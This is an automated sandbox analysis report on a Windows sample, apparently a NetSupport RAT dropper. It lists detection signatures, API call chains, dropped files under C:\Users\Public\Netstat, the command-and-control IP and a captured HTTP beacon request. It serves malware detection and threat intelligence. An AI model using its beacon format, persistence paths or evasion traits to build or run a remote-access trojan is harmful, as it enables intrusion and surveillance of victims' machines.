Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562378
MD5:	a3cea314d888a08b79002656a9f4b927
SHA1:	396b9f96219785f0c80c69703dc623c23554affc
SHA256:	64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
Tags:	exeuser-Bitsight
Infos:

Detection

NetSupport RAT

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Delayed program exit found

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Uses cmd line tools excessively to alter registry or file data

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Netstat\remcmdstub.exe	ReversingLabs: Detection: 13%
Source: C:\Users\Public\Netstat\shv.exe	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		6_2_110AD570
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		9_2_110AD570

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,	0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	9_2_1110AFD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:49708 -> 45.61.128.74:443

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.26.0.231 104.26.0.231

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: file.exe, 00000000.00000003.2145215251.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2146640720.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144886227.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspU
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspc
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspi
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: remcmdstub.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Contains functionality for read data from the clipboard

Source: C:\Users\Public\Netstat\shv.exe

